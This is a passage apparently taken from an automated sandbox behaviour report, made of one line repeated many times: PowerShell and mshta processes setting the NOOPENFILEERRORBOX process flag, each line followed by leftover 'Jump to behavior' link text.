                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
